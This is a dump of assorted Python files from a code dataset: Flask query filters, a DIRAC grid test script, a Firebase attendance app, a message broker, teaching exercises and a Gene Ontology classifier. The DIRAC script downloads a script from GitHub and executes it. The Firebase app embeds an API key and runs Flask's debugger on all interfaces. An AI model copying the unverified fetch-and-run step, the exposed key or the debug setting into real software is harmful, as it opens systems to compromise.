schema_class(**init_args)\n # Decorator\n def decorator(func):\n # Save parsed result into target variable\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n setattr(g, target, load_data(schema, request.get_json(), **load_args))\n return func(*args, **kwargs)\n return wrapper\n return decorator\n\n# Comparison filters\n__comp_filters = {\n \"eq\": operator.eq,\n \"ne\": operator.ne,\n \"gt\": operator.gt,\n \"gte\": operator.ge,\n \"lt\": operator.lt,\n \"lte\": operator.le,\n \"contains\": ColumnOperators.contains,\n \"icontains\": lambda column, text: column.ilike(\"%\"+text+\"%\")\n}\n\n# Logical filter\n__logical_filters = {\n \"and\": and_,\n \"or\": or_,\n \"not\": not_\n}\n\ndef __build_filter_exp(query, model):\n \"\"\"\n Recursively build SQLAlchemy filter expression from user-provided query.\n\n Args:\n query: An array whose first element is the name of the filter.\n Subsequent elements in this array are the parameters of this filter.\n Parameters can be a single value or another query array.\n e.g. [\"and\", [\"eq\", \"field1\", true], [\"or\", [\"ne\", \"field2\", \"hi\"], [\"gte\", \"field3.nested\", 10]]]\n model: Data model on which fields in the filters can be found.\n Returns:\n A corresponding SQLAlchemy filter expression.\n Raises:\n APIError: When unknown query operator occurs.\n \"\"\"\n # Comparison filters\n comp_builder = __comp_filters.get(query[0])\n if comp_builder:\n field = getattr_keypath(model, query[1])\n return comp_builder(field, query[2])\n # Logical filters\n logical_builder = __logical_filters.get(query[0])\n if logical_builder:\n nested_exp_list = [__build_filter_exp(nested_query, model) for nested_query in query[1:]]\n return logical_builder(*nested_exp_list)\n # Unknown filter\n raise APIError(400, \"unknown_query_oper\", operator=query[0])\n\ndef __filter_handler(query_set, model, params):\n \"\"\"\n Handle user-provided filtering requests.\n\n Args:\n query_set: SQLAlchemy query set to be filtered.\n model: Data model from which given query set is generated.\n params: User-provided filter params, with format {\"query\": [...], ...}.\n For query format see \"__build_filter_exp\" function.\n Returns:\n A query set with user-provided filters applied.\n \"\"\"\n query = params.get(\"query\")\n if query:\n filter_exp = __build_filter_exp(query, model)\n return query_set.filter(filter_exp)\n else:\n return query_set\n\ndef __ordering_handler(query_set, model, params):\n \"\"\"\n Handle ordering requests.\n\n Args:\n query_set: SQLAlchemy query set to be ordered.\n model: Data model from which given query set is generated.\n params: User-provided filter params, with format {\"order\": {\"field1\": , ...}, ...}.\n True indicates ascending order, while False indicates descending order.\n Returns:\n A query set with user-provided ordering applied.\n \"\"\"\n orders = params.get(\"order\")\n if not orders:\n return query_set\n # Ordering\n sqla_params = []\n for (field_keypath, order) in orders:\n field = getattr_keypath(model, field_keypath)\n param = field.asc() if order else field.desc()\n sqla_params.append(param)\n return query_set.order_by(*sqla_params)\n\ndef __pagination_handler(query_set, model, params):\n \"\"\"\n Handle user-provided pagination requests.\n\n Args:\n query_set: SQLAlchemy query set to be paginated.\n model: Data model from which given query set is generated.\n params: User-provided filter params, with format {\"offset\": , \"limit\": , ...}.\n Returns:\n A query set with user-provided pagination applied.\n \"\"\"\n # Offset\n offset = params.get(\"offset\")\n if offset!=None:\n query_set = query_set.offset(offset)\n # Limit\n limit = params.get(\"limit\")\n if limit!=None:\n query_set = query_set.limit(limit)\n return query_set\n\n# User filter handlers\n__user_filters = [\n __filter_handler,\n __pagination_handler,\n __ordering_handler\n]\n\ndef filter_user(query_set, model):\n \"\"\"\n Apply user-provided data filters to given query set.\n\n Args:\n query_set: SQLAlchemy query set to be filtered.\n model: Data model from which given query set is generated.\n Returns:\n A query set with user-provided filters, ordering and pagination applied.\n \"\"\"\n # Handle user filters\n for handler in __user_filters:\n query_set = handler(query_set, model, g.json_params)\n return query_set\n\nclass FileField(fields.Field):\n \"\"\" Schema field for FileDepot file. \"\"\"\n def _serialize(self, value, attr, obj):\n return value.path if value else value\n def _deserialize(self, value, attr, data):\n return value\n\ndef get_data():\n \"\"\" Get request data from request object. \"\"\"\n # JSON\n if request.is_json:\n return request.get_json()\n req_data = {}\n # Form\n for key, value in request.form.items():\n req_data[key] = json.loads(value)\n # File\n for key, value in request.files.items():\n req_data[key] = value\n return req_data\n\nunique_msg_rx = re.compile(r\"\\((\\w+)\\)=\\((\\w+)\\)\")\n\ndef handle_prog_error(e):\n \"\"\" Handle PG8000 programming error. \"\"\"\n # Error arguments and numbers\n error_args = e.orig.args\n errno = int(error_args[2])\n # Unique constraint violation\n if errno==23505:\n key, value = unique_msg_rx.search(error_args[4]).groups()\n return APIError(400, \"unique_violation\", key=key, value=value)\n return e\n","sub_path":"app/util/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":15413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"111024802","text":"from MovingAverageStreamer import MovingAverageStreamer\n\nclass HiLoActivator:\n\n def __init__(self, period):\n self.movingAverage = MovingAverageStreamer(period)\n self.period = period\n self.trend = False #False: downtrend; True: uptrend\n self.lastValue = (False, True)\n\n def getInitializationSize(self):\n return self.period + 1\n\n def setup(self, initialData):\n if len(initialData) < self.getInitializationSize():\n raise(ValueError(\"Not enough initialization data.\"))\n\n self.movingAverage.setup(initialData[:-1])\n\n movingAverage = self.movingAverage.lastValue\n lastClose = initialData[len(initialData)-1]\n\n if movingAverage > lastClose:\n trend = True\n reversal = trend != self.trend\n elif movingAverage < lastClose:\n trend = False\n reversal = trend != self.trend\n else:\n trend = self.trend\n reversal = False\n\n self.trend = trend\n self.lastValue = (trend, reversal)\n\n self.movingAverage.onData(lastClose)\n\n def onData(self, data):\n movingAverage = self.movingAverage.lastValue\n lastClose = data\n\n if movingAverage > lastClose:\n trend = True\n reversal = trend != self.trend\n elif movingAverage < lastClose:\n trend = False\n reversal = trend != self.trend\n else:\n trend = self.trend\n reversal = False\n\n self.trend = trend\n self.lastValue = (trend, reversal)\n\n self.movingAverage.onData(data)\n\n return (trend, reversal)\n","sub_path":"generalized_code/HiLoActivator.py","file_name":"HiLoActivator.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"389274098","text":"#!/usr/bin/env python3\n\"\"\"\nMain program for checking the status of dirac01.\nInstalls a fresh UI and submits jobs to a variety of sites\n(HTCondorCE, ARC) using the selected VO. Also tried to replicate\nand register a file.\n\"\"\"\nimport os\nimport sys\nimport install_ui\nimport make_jdls\nimport check_dirac_helpers\n\n\ndef main():\n \"\"\"This is where all the action is. \"\"\"\n print(\"Welcome to the basic dirac test script.\")\n print(\"Please make sure you are using an SL7 compatible machine.\")\n print(\"You will also need a valid user certificate in $HOME/.globus \\n\")\n\n # 0. Sanity checks\n check_dirac_helpers.check_prerequisites()\n\n # 1. Setup a UI\n # pick which VO to test, default: gridpp\n print(\"Which VO do you want to test (default: gridpp) ?\")\n user_VO = input(\"Your choices are: gridpp, lz, lsst, solidexperiment.org, skatelescope.eu: \") \\\n or \"gridpp\"\n if user_VO not in [\"gridpp\", \"lz\", \"lsst\", \"solidexperiment.org\", \"skatelescope.eu\"]:\n print(f\"Testing for {user_VO} VO is not supported.\")\n sys.exit(0)\n\n # use cvmfs ui or install local one, default: local\n install_type = input(\"Install new local UI or use cvmfs (default: local)? Please enter: 'local'/'cvmfs': \") \\\n or \"local\"\n if install_type not in [\"local\", \"cvmfs\"]:\n print(f\"WARNING: install_type {install_type} not known, proceeding with local install.\")\n install_type = \"local\"\n\n install_ui.setup_ui(user_VO, install_type)\n\n # 2. Select Sites and make JDLs\n # aiming for good UK coverage, ARC and HTCondor\n sites_to_check = [\"LCG.UKI-LT2-IC-HEP.uk\",\n \"LCG.UKI-LT2-QMUL.uk\",\n \"LCG.UKI-LT2-Brunel.uk\",\n \"LCG.UKI-NORTHGRID-LANCS-HEP.uk\",\n \"LCG.UKI-NORTHGRID-LIV-HEP.uk\",\n \"LCG.UKI-SOUTHGRID-RALPP.uk\"]\n\n if user_VO == \"solidexperiment.org\":\n sites_to_check = [\"LCG.UKI-LT2-IC-HEP.uk\", \"LCG.BEgrid.ULB-VUB.be\"]\n\n if user_VO == \"skatelescope.eu\":\n sites_to_check = [\"LCG.UKI-LT2-IC-HEP.uk\", \"LCG.UKI-NORTHGRID-MAN-HEP.uk\",\n \"LCG.RAL-LCG2.uk\", \"LCG.SARA-MATRIX.nl\"]\n if user_VO == \"lz\":\n sites_to_check.append(\"CLOUD.UKI-LT2-IC-HEP-lz.uk\")\n\n make_jdls.make_jdls(user_VO, sites_to_check)\n\n # 3. Check that dirac test script works locally\n print('Running local test of script to submit: diractest.sh')\n working_dir = os.getcwd()\n testscript = os.path.join(working_dir, \"diractest.sh\")\n test_submitted_script_cmd = [testscript, \"testarg1\", \"testarg2\"]\n check_dirac_helpers.complex_run(test_submitted_script_cmd)\n\n # write job numbers corresponding to sites to a log file\n outfile_name = os.path.join(working_dir, \"sites.log\")\n\n# 6. Job Submission\n outfile = open(outfile_name, \"a\", encoding=\"utf-8\")\n\n for site in sites_to_check:\n\n jdlfile = site + \".jdl\"\n print(site)\n\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\", \"jobs.log\", jdlfile]\n outfile.write(f\"Submitting standard job to {site}\\n\")\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n # now all the special cases (all these sites also receive a standard test job)\n # all special cases run either at RALPP or Imperial\n\n if site == \"LCG.UKI-SOUTHGRID-RALPP.uk\":\n print(f\"Submitting multicore job for {user_VO} VO to {site}\")\n outfile.write(f\"Submitting multicore job for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-SOUTHGRID-RALPP.uk.multi.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n if site == \"LCG.UKI-LT2-IC-HEP.uk\":\n print(f\"Submitting multicore job for {user_VO} VO to {site}\")\n outfile.write(f\"Submitting multicore job for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-LT2-IC-HEP.uk.multi.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n print(f\"Submitting EL7 job for {user_VO} VO to {site}\")\n outfile.write(f\"Submitting EL7 job for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-LT2-IC-HEP.uk.el7.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n print(f\"Submitting job requiring InputData for {user_VO} VO to {site}\\n\")\n outfile.write(f\"Submitting job requiring InputData for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-LT2-IC-HEP.uk.inputdata.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n print(f\"Submitting tag (GPU) job for {user_VO} VO to {site}\")\n outfile.write(f\"Submitting tag (GPU) job for {user_VO} VO to {site}\\n\")\n sub_cmd = [\"dirac-wms-job-submit\", \"-f\",\n \"jobs.log\", \"LCG.UKI-LT2-IC-HEP.uk.tag.jdl\"]\n command_log = install_ui.complex_run(sub_cmd)\n check_dirac_helpers.jobid_to_file(command_log, outfile)\n\n\n outfile.close()\n\n # test API submission (currently basic implemetation only)\n wget_cmd_api = [\"wget\", \"-np\", \"-O\", \"testapi.py\",\n \"https://raw.githubusercontent.com/ic-hep/DIRAC-tools/master/check_dirac/grid_and_cloud_api_test.py\"]\n install_ui.simple_run(wget_cmd_api)\n os.chmod(\"testapi.py\", 0o744)\n wget_cmd_aux = [\"wget\", \"-np\", \"https://raw.githubusercontent.com/ic-hep/DIRAC-tools/master/user/testapi.sh\"]\n install_ui.simple_run(wget_cmd_aux)\n sub_cmd_api = [\"./testapi.py\", user_VO]\n install_ui.simple_run(sub_cmd_api)\n\n # 7. Datamanagement: Test replicate and register (using FTS) function\n check_dirac_helpers.simple_run([os.path.join(working_dir, \"repandreg.sh\")])\n\n # 8. Closing statement\n print('\\nTo check on the status of the test jobs, please do:')\n print('cd '+ working_dir)\n\n if os.path.isfile('bashrc'):\n print('source bashrc')\n elif install_type == \"cvmfs\":\n print('source /cvmfs/dirac.egi.eu/dirac/bashrc_gridpp')\n else:\n print('source diracos/diracosrc')\n print('dirac-wms-job-status -f jobs.log')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"check_dirac/check_dirac.py","file_name":"check_dirac.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"368393296","text":"from flask import Flask, redirect,url_for,request,render_template\nimport pyrebase\n\n\nconfig = {\n \"apiKey\": \"AIzaSyAT4CknPPpJmPb8kT_DOgLcLG1a1eeUshY\",\n \"authDomain\": \"attendance-app-3dbd3.firebaseapp.com\",\n \"databaseURL\": \"https://attendance-app-3dbd3.firebaseio.com/\",\n \"storageBucket\": \"attendance-app-3dbd3.appspot.com\",\n }\nfirebase = pyrebase.initialize_app(config)\ndb = firebase.database()\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/attendance', methods=['POST'])\ndef attendance():\n from datetime import datetime\n if request.method == 'POST':\n name = request.form['name']\n email = request.form['email']\n empid = request.form['empID']\n now = datetime.now()\n time = now.strftime(\"%H:%M:%S\")\n \n data = { \"name\": name, \"email\" : email, \"empID\" : empid, \"time\" : time}\n\n db.child(\"users\").push(data)\n return render_template('result.html', name=name, email=email, empid=empid, time=time)\n\n \nif __name__ == '__main__':\n app.run(host='0.0.0.0',debug=True, port=8080)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"233097649","text":"from bs4 import BeautifulSoup\n\nwith open(\"index.html\") as fp:\n soup = BeautifulSoup(fp,'lxml')\n\nprint(soup.text)\n\nprint(soup.text.split())\n\n# Mở file\nfile = open(\"plc.txt\", \"wt\")\nfile.write(soup.text)\n\n# Đóng file\nfile.close()\n\n","sub_path":"Week1/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"595762068","text":"from student import Student #If you are importing the class here directly you dont need to write the modulename.classname\n#from modulename import classname/function/variable\nstudents = []\n\ndef main_menu():\n\tprint(\"1. Add student\")\n\tprint(\"2. Delete student\")\n\tprint(\"3. Search Student\")\n\tprint(\"4. Display all student\")\n\tprint(\"5. Change a student name in the list\") \n\tprint(\"6. Manage All groups\")\n\tprint(\"7. exit\")\n\n\nwhile True:\n\tmain_menu()\n\tch = int(input(\"Enter your choice\"))\n\tif ch == 1:\n\t\t#Add student\n\t\tst_id = input(\"\\tEnter student id : \")\n\t\tname = input(\"\\tEnter name : \")\n\t\tage = input(\"\\tEnter student age : \")\n\t\tgrade = input(\"\\tEnter grade : \")\n\n\t\tst_temp = Student(st_id,name,age,grade)\n\t\tstudents.append(st_temp)\n\n\telif ch == 2:\n\t\t#Delete student\n\t\tpass\n\telif ch == 3:\n\t\t#Search student\n\t\tname = input(\"Enter name :\")\n\t\tst = list(filter(lambda a: a.name == name , students))\n\t\tif len(st) == 0: #not st #st\n\t\t\tprint(\"No student found\")\n\t\telse:\n\t\t\tfor i in st:\n\t\t\t\tprint(f\"{i.name}\")\n\t\t#grade = input(\"Enter grade :\")\n\t\t#st = list(filter(lambda a: a.grade == grade ,students))\n\t\t#for i in st:\n\t\t#\tprint(f\"{i.name}\")\n\telif ch == 4:\n\t\t#Display student\n\t\tfor i in students:\n\t\t\tprint(f\"{i.name} | {i.age} | {i.grade} \")\n\telif ch== 5:\n\t\t#Change a student name in the list\n\t\tst_id = input(\"Enter Student id: \")\n\t\tst_temp = list(filter(lambda a: a.st_id == st_id,students))\n\t\tst_temp[0].set_name(input(\"Enter new name: \"))\n\telif ch == 6:\n\t\t#Manage team\n\t\tpass\n\telif ch == 7:\n\t\t#Exit\n\t\tbreak;\n\telse:\n\t\tprint(\"Invalid Choice\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"docs_and_codes/DayWiseFiles_ppt/17AugDay17/learn_python/OOPs/student_project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"372514707","text":"\"\"\"\nAUTHOR :Robin Singh\nIMPLEMENTAION OF BINARY SEARCH\nIt Uses Divide And Conquer Approch,Binary search works on sorted arrays\nBinary search begins by comparing an element in the middle of the array with the target value,\nIf the target value matches the element, its position in the array is returned,\nIf the target value is less than the element, the search continues in the lower half of the array,\nIf the target value is greater than the element, the search continues in the upper half of the array\nComplexity : O(Logn)\n\n\n\"\"\"\ndef Binary_search(A,key,low,high):\n if low > high:\n print(\"Not Present\")\n else:\n m = (low+high)//2\n if key == A[m]:\n print(\"Element is Present at index\",m)\n elif key < A[m]:\n return Binary_search(A,key,low,m-1)\n else:\n return Binary_search(A,key,m+1,high)\n\n\nA = []\nwhile(1):\n print(\"\\n1.Insert\\t2.Search\\t3.Exit\\t4.Dispaly\\n\")\n ch = int(input(\"Entre Choice\"))\n if ch == 3:\n break\n elif ch ==1:\n n = int(input(\"Entre Number in ASSENDING ORDER\"))\n A.append(n)\n\n elif ch ==2:\n search = int(input(\"Enter Number to be searched\"))\n Binary_search(A,search,0,len(A))\n\n elif ch == 4:\n for i in range(0,len(A)):\n print(A[i],end=\" \")\n\n else:\n print(\"Invalid Option\")\n\n\n\n\n\n\n\n\n\n","sub_path":"Algorithms/Divide _And _Conquer/Binary_Search.py","file_name":"Binary_Search.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"622290265","text":"# session的简单使用\n\n# from requests import Session\n#\n# # 建立 session 对象\n# session = Session()\n#\n# # 设置 cookies\n# session.get('http://httpbin.org/cookies/set/sessioncookie/123456789')\n#\n# # 获取 cookies\n# response = session.get(\"http://httpbin.org/cookies\")\n#\n# print(\"Response Body\".center(40, \"-\"))\n# print(response.text)\n#\n# print(\"Response Headers\".center(40, \"-\"))\n# print(response.headers)\n\n\n# # 探究Request对象和Response对象\n#\n# import requests\n#\n# r = requests.get('http://en.wikipedia.org/wiki/Monty_Python')\n#\n# print(\"Response Headers\".center(40, \"-\"))\n# print(r.headers)\n#\n# print(\"Request Headers\".center(40, \"-\"))\n# print(r.request.headers)\n\n\n# custom Request对象\nfrom requests import Session, Request\n\nURL_IP = \"https://httpbin.org/ip\"\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/69.0.3497.100 Safari/537.36'}\n\ns = Session()\n\nreq = Request(\"GET\",\n url=URL_IP,\n headers=headers)\nprepped = req.prepare()\n\nresp = s.send(prepped,\n # stream=stream,\n # verify=verify,\n # proxies=proxies,\n # cert=cert,\n timeout=10\n )\n\nprint(resp.status_code)\n\nprint(resp.text)\n\nprint(resp.request)\n\nprint(resp.request.headers)\n\n\n\n\n\n\n\n","sub_path":"requests_review/requests_play.py","file_name":"requests_play.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"432695649","text":"import asyncio\nimport json\n\nfrom .handlers import dispatch_message\n\n@asyncio.coroutine\ndef send_error(writer, reason):\n message = {\n 'type': 'error',\n 'payload': reason\n }\n payload = json.dumps(message).encode('utf-8')\n writer.write(payload)\n yield from writer.drain()\n\n\n@asyncio.coroutine\ndef handle_message(reader, writer):\n data = yield from reader.read()\n address = writer.get_extra_info('peername')\n\n print('Recevied message from %s', address)\n\n try:\n message = json.loads(data.decode('utf-8'))\n except ValueError as e:\n print('Invalid message received')\n send_error(writer, str(e))\n return\n\n try:\n response = yield from dispatch_message(message)\n payload = json.dumps(response).encode('utf-8')\n writer.write(payload)\n yield from writer.drain()\n writer.write_eof()\n except ValueError as e:\n print('Cannot process the message. %s')\n send_error(writer, str(e))\n\n writer.close()\n\ndef run_server(hostname='localhost', port=14141, loop=None):\n if loop is None:\n loop = asyncio.get_event_loop()\n coro = asyncio.start_server(handle_message, hostname, port, loop=loop)\n server = loop.run_until_complete(coro)\n print('Serving on %s', server.sockets[0].getsockname())\n print('Press Ctrl + C to stop the application')\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n server.close()\n loop.run_until_complete(server.wait_closed())\n loop.close()\n","sub_path":"src/notibroker/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"638641601","text":"from random import randint# 该版本实现的功能有:1、根据玩家姓名进行游戏数据的记录(存在save.txt中)\nimport datetime,time #2、游戏记录中添加了一项猜出数字最短时间的记录\n\nname=input('请输入玩家名字:')\n\nf=open('save.txt')\nlines=f.readlines()\nf.close()\n\nscores={}\nfor l in lines:\n s=l.split()\n scores[s[0]]=s[1:]\nscore=scores.get(name)\nif(score is None):\n score=[0,0,0,0]\n\ngame_times=int(score[0])\nmin_times=int(score[1])\ntotal_times=int(score[2])\nmin_t=int(score[3])\nif(game_times > 0):\n avg_times=float(total_times)/game_times\nelse:\n avg_times=0\nif(game_times==0):\n print('欢迎你玩这个游戏')\nelse:\n print('%s,你已经玩了%d次了,最少%d轮猜出答案,平均%.2f轮猜出答案,最少用%d秒猜出答案。' % (name,game_times,min_times,avg_times,min_t))\n\nnum=randint(1,100)\ntimes=0\nbingo=True\nwhile(bingo):\n times+=1\n if(times==1):\n answer=int(input('输入数字开始游戏:'))\n start=datetime.datetime.now()\n else:\n answer=int(input('请猜数字:'))\n if(answer>num):\n print('太大')\n elif(answertimes):\n min_times=times\nif(game_times==0 or min_t>t):\n min_t=t\ntotal_times+=times\ngame_times+=1\n\n\nscores[name]=[str(game_times),str(min_times),str(total_times),str(min_t)]\nresult=''\nfor n in scores:\n line=n+' '+' '.join(scores[n])+'\\n'\n result += line\n \nf=open('save.txt','w')\nf.write(result)\nf.close()","sub_path":"guessnum2.1.py","file_name":"guessnum2.1.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"451029353","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\nimport logging\nimport sys\n\nimport requests\n\nlogging.basicConfig(\n stream=sys.stdout,\n level=logging.INFO,\n format='[%(asctime)s] %(name)s:%(levelname)s: %(message)s',\n)\nlogger = logging.getLogger(__name__)\n\n\ndef encode_go_term_classes():\n go_obo_url = 'http://purl.obolibrary.org/obo/go.obo'\n encode_go_class_dict = {\n 'GO:0003700': 'transcription factor',\n 'GO:0003723': 'RNA binding protein',\n 'GO:0001070': 'RNA binding protein',\n 'GO:0008134': 'cofactor',\n 'GO:0003712': 'cofactor',\n 'GO:0005736': 'RNA polymerase complex',\n 'GO:0016591': 'RNA polymerase complex',\n 'GO:0005666': 'RNA polymerase complex',\n 'GO:0006325': 'chromatin remodeler',\n 'GO:0000118': 'chromatin remodeler',\n 'GO:0007062': 'cohesin',\n 'GO:0006260': 'DNA replication',\n 'GO:0006281': 'DNA repair',\n 'GO:0000788': 'histone',\n 'GO:0003677': 'backup label-transcription factor',\n 'GO:0003682': 'backup label-transcription factor',\n 'GO:0043167': 'backup label-transcription factor',\n }\n term_dict = {}\n with requests.get(go_obo_url, stream=True) as go_obo:\n # https://owlcollab.github.io/oboformat/doc/GO.format.obo-1_4.html#S.2.2\n for stanza in go_obo.iter_lines(decode_unicode=True, delimiter='\\n\\n'):\n if not stanza:\n continue\n lines = stanza.split('\\n')\n if len(lines) < 2:\n raise ValueError(\n 'Stanza \"{}\" has less than 2 lines.'.format(stanza)\n )\n stanza_type = lines[0]\n if stanza_type != '[Term]':\n continue\n if not lines[1].startswith('id: '):\n raise ValueError(\n 'Stanza \"{}\" fails to start with an id tag.'.format(stanza)\n )\n term_id = lines[1].split(': ')[1]\n term_dict[term_id] = set()\n for tag_value_pair in lines[2:]:\n tag, value = tag_value_pair.split(': ', maxsplit=1)\n if tag in ['is_a', 'alt_id', 'replaced_by']:\n term_dict[term_id].add(value.split(' ', maxsplit=1)[0])\n continue\n if tag in ['relationship', 'intersection_of']:\n relationship, go_id, _ = value.split(' ', maxsplit=2)\n # The following relations are defined by [Typedef] stanzas\n if relationship in [\n 'part_of',\n 'regulates',\n 'negatively_regulates',\n 'positively_regulates',\n 'occurs_in'\n ]:\n term_dict[term_id].add(go_id)\n term_classifications = {}\n for term_id in term_dict:\n new_terms = {term_id} - term_dict[term_id]\n # Extend related terms until there is no new terms to be added\n # Self term ID is not added in the loop above so that there will be at\n # least one round of checking\n while new_terms:\n term_dict[term_id] |= new_terms\n new_terms = set()\n for related_term_id in term_dict[term_id]:\n new_terms |= term_dict.get(\n related_term_id, set()\n ) - term_dict[term_id]\n # Get ENCODE classifications\n encode_go_classes = {\n encode_go_class_dict[related_term_id]\n for related_term_id in term_dict[term_id]\n if related_term_id in encode_go_class_dict\n }\n if not encode_go_classes:\n continue\n if (\n 'backup label-transcription factor' in encode_go_classes\n and len(encode_go_classes) > 1\n ):\n encode_go_classes.remove('backup label-transcription factor')\n if encode_go_classes == {'Chromatin remodeler', 'Histone'}:\n encode_go_classes = {'Histone'}\n if encode_go_classes == {'chromatin remodeler', 'DNA replication'}:\n encode_go_classes = {'chromatin remodeler'}\n if encode_go_classes == {'DNA repair', 'DNA replication'}:\n encode_go_classes = {'DNA repair'}\n term_classifications[term_id] = list(encode_go_classes)\n fname = 'ENCODE_GO_map.json'\n logger.info('Save ENCODE GO category map to {}'.format(fname))\n with open(fname, 'x') as f:\n json.dump(term_classifications, f)\n return term_classifications\n\n\ndef classify_go_evidence(go_evidence_list, encode_go_classes):\n # Get best evidenced classes and their evidence count\n evidence_weight = {\n 'EXP': 2,\n 'IDA': 2,\n 'IMP': 2,\n 'IGI': 2,\n 'IEP': 2,\n 'HTP': 1,\n 'HDA': 1,\n 'HMP': 1,\n 'HGI': 1,\n 'HEP': 1,\n 'TAS': 1,\n 'IEA': -1\n }\n best_weight = -1\n best_evidenced_classes = {}\n for go_id, evidence in go_evidence_list:\n weight = evidence_weight.get(evidence, -1)\n if weight < best_weight:\n continue\n clazz = encode_go_classes.get(go_id)\n if not clazz:\n continue\n if weight > best_weight:\n best_weight = weight\n for c in clazz:\n best_evidenced_classes = {c: 1}\n elif weight == best_weight:\n for c in clazz:\n if c in best_evidenced_classes:\n best_evidenced_classes[c] += 1\n else:\n best_evidenced_classes[c] = 1\n if 'backup label-transcription factor' in best_evidenced_classes:\n if len(best_evidenced_classes) == 1:\n return ['transcription factor']\n best_evidenced_classes.pop('backup label-transcription factor')\n return [\n clz for clz in best_evidenced_classes\n if best_evidenced_classes[clz] == max(best_evidenced_classes.values())\n ]\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Calculate ENCODE category for a target.'\n )\n parser.add_argument(\n '--uniprots',\n nargs='+',\n help='One or more UniProt ID(s). For example, Q9H9Z2'\n )\n parser.add_argument(\n '--mgis',\n nargs='+',\n help='One or more MGI ID(s). For example, 1890546'\n )\n parser.add_argument(\n '--fbs',\n nargs='+',\n help='One or more FlyBase ID(s). For example, FBgn0035626'\n )\n parser.add_argument(\n '--wbs',\n nargs='+',\n help='One or more WormBase ID(s). For example, WBGene00003014'\n )\n parser.add_argument(\n '--encode-go-map',\n default='ENCODE_GO_map.json',\n help='A JSON file mapping GO terms to ENCODE target categories.'\n )\n parser.add_argument(\n '--get-new-encode-go-map',\n action='store_true',\n help='A JSON file mapping GO terms to ENCODE target categories.'\n )\n args = parser.parse_args()\n if not (args.uniprots or args.mgis or args.fbs or args.wbs):\n parser.print_help()\n parser.exit(\n status=1,\n message='ERROR: At lease one ID from UniProtKB, MGI, FlyBase or '\n 'WormBase is required!\\n'\n )\n if args.get_new_encode_go_map:\n encode_go_dict = encode_go_term_classes()\n else:\n try:\n with open(args.encode_go_map) as f:\n encode_go_dict = json.load(f)\n except Exception as e:\n raise ValueError(\n 'Fail to load ENCODE GO category map at {}. Please either '\n 'provide a valid ENCODE GO category map in JSON format or use '\n '\"--get-new-encode-go-map\" and ensure internet connection.'\n ) from e\n bioentity_ids = set()\n if args.uniprots:\n bioentity_ids |= {'\"UniProtKB:{}\"'.format(i) for i in args.uniprots}\n if args.mgis:\n bioentity_ids |= {'\"MGI:MGI:{}\"'.format(i) for i in args.mgis}\n if args.fbs:\n bioentity_ids |= {'\"FB:{}\"'.format(i) for i in args.fbs}\n if args.wbs:\n bioentity_ids |= {'\"WB:{}\"'.format(i) for i in args.wbs}\n filter_query = ' OR '.join(bioentity_ids)\n golr_base_url = 'http://golr-aux.geneontology.io/solr/select?fq=document_category:\"annotation\"&q=*:*&fq=bioentity:({})&rows={}&wt=json' # noqa: E501\n rows_count = requests.get(\n golr_base_url.format(filter_query, 1)\n ).json()['response']['numFound']\n print(golr_base_url.format(filter_query, rows_count))\n go_evidence = [\n (annotation['annotation_class'], annotation['evidence_type'])\n for annotation in requests.get(\n golr_base_url.format(filter_query, rows_count)\n ).json()['response']['docs']\n ]\n logger.info(classify_go_evidence(go_evidence, encode_go_dict))\n\n\nif __name__ == 